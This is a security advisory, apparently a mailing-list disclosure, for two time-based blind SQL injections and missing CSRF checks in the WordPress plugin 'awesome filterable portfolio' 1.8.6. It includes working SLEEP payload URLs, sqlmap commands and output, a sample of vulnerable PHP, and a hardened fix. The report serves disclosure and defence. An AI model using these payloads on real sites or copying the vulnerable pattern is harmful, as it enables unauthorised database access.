Subject: Blind SQL injection and CSRF for logged administrators in awesome filterable portfolio 1.8.6
Date: Tue, 7 Jul 2015 10:29:48 +0200

Hello,

Plugin: awesome filterable portfolio 1.8.6

Logged-in administrators can execute arbitrary SQL commands (there is no CSRF protection).

1. SQL injection (afp_get_new_portfolio_item_page())

Method: GET
Url: http://localhost/wp-admin/admin.php?page=afp_add_new_portfolio_item&item_id=1+and+%28select+sleep%2810%29%29
Vulnerable parameter: item_id

Example PHP callstack:
  afp_get_new_portfolio_item_page   [/awesome-filterable-portfolio/afp.php:240]
  wpdb::get_row

Sqlmap verification:

sqlmap --dbms mysql --cookie "..." -u "http://localhost/wp-admin/admin.php?page=afp_add_new_portfolio_item&item_id=1" -p item_id

...
Parameter: item_id (GET)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: page=afp_add_new_portfolio_item&item_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))EXyJ)
...
2. SQL injection (afp_get_new_category_page())

Method: GET
Url: http://localhost/wp-admin/admin.php?page=afp_add_new_category&cat_id=1+and+%28select+sleep%285%29%29
Vulnerable parameter: cat_id

Example PHP callstack:
  afp_get_new_category_page   [/awesome-filterable-portfolio/afp.php:492]
  wpdb::get_row

Sqlmap verification:

sqlmap --dbms mysql --cookie "..." -u "http://localhost/wp-admin/admin.php?page=afp_add_new_category&cat_id=1" -p cat_id

...
Parameter: cat_id (GET)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: page=afp_add_new_category&cat_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))ZQyD)
...

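Both findings above share one root cause: an id taken from the query string reaches wpdb::get_row() unprepared, on an admin page that checks no nonce. The following PHP is an added example written for this note, not the plugin's own source: it sketches the pattern consistent with the reported callstack and, beside it, a hardened handler that covers both item_id and cat_id. Table names, the nonce action names, the capability check and the function names are assumptions chosen for illustration.

```php
<?php
// Added example, not code from awesome-filterable-portfolio.
// Illustrative vulnerable pattern (assumption, consistent with the callstack:
// the raw GET value is concatenated into the statement, and nothing ties the
// request to a form the administrator actually submitted).
function afp_example_vulnerable_lookup( $table ) {
    global $wpdb;
    $id = $_GET['item_id'];                                   // untrusted
    return $wpdb->get_row( "SELECT * FROM {$table} WHERE id = " . $id );
}

// Hardened handler used for both the item page and the category page.
// $param is the query-string key ('item_id' or 'cat_id'), $table the
// (hypothetical) table, $nonce_action the action the link was signed with.
function afp_example_get_row( $param, $table, $nonce_action ) {
    global $wpdb;

    // CSRF: require a nonce bound to this admin action. check_admin_referer()
    // stops the request (wp_die) when the nonce is missing or invalid, so a
    // link planted on another site cannot drive this page.
    check_admin_referer( $nonce_action );

    // Authorisation: the query runs only for users allowed to manage the site.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }

    // Input: the id is a positive integer. absint() reduces anything else to
    // its numeric prefix or 0 (e.g. "1 and (select sleep(10))" becomes 1).
    $id = isset( $_GET[ $param ] ) ? absint( $_GET[ $param ] ) : 0;
    if ( 0 === $id ) {
        return null;
    }

    // Query: a %d placeholder through $wpdb->prepare() so the value can never
    // change the shape of the statement, whatever absint() returned.
    $sql = $wpdb->prepare( "SELECT * FROM {$table} WHERE id = %d", $id );
    return $wpdb->get_row( $sql );
}

// Usage in the two affected pages (hypothetical table and action names):
//   global $wpdb;
//   $item = afp_example_get_row( 'item_id', $wpdb->prefix . 'afp_items',      'afp_edit_item' );
//   $cat  = afp_example_get_row( 'cat_id',  $wpdb->prefix . 'afp_categories', 'afp_edit_category' );
//
// Every link or form that reaches these pages must carry the matching nonce:
//   $url = wp_nonce_url(
//       admin_url( 'admin.php?page=afp_add_new_portfolio_item&item_id=' . (int) $item_id ),
//       'afp_edit_item'
//   );
```

The nonce and the prepared statement are independent fixes: prepare() alone still lets a cross-site link read a row on the administrator's behalf, and the nonce alone still leaves the SQL injectable by anyone who is logged in. Verifying the fix is the same sqlmap run shown above against the patched page; the time-based technique should no longer find an injection point on item_id or cat_id.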

--
Regards,
Marcin Probola,
https://wordpress.org/plugins/awesome-filterable-portfolio/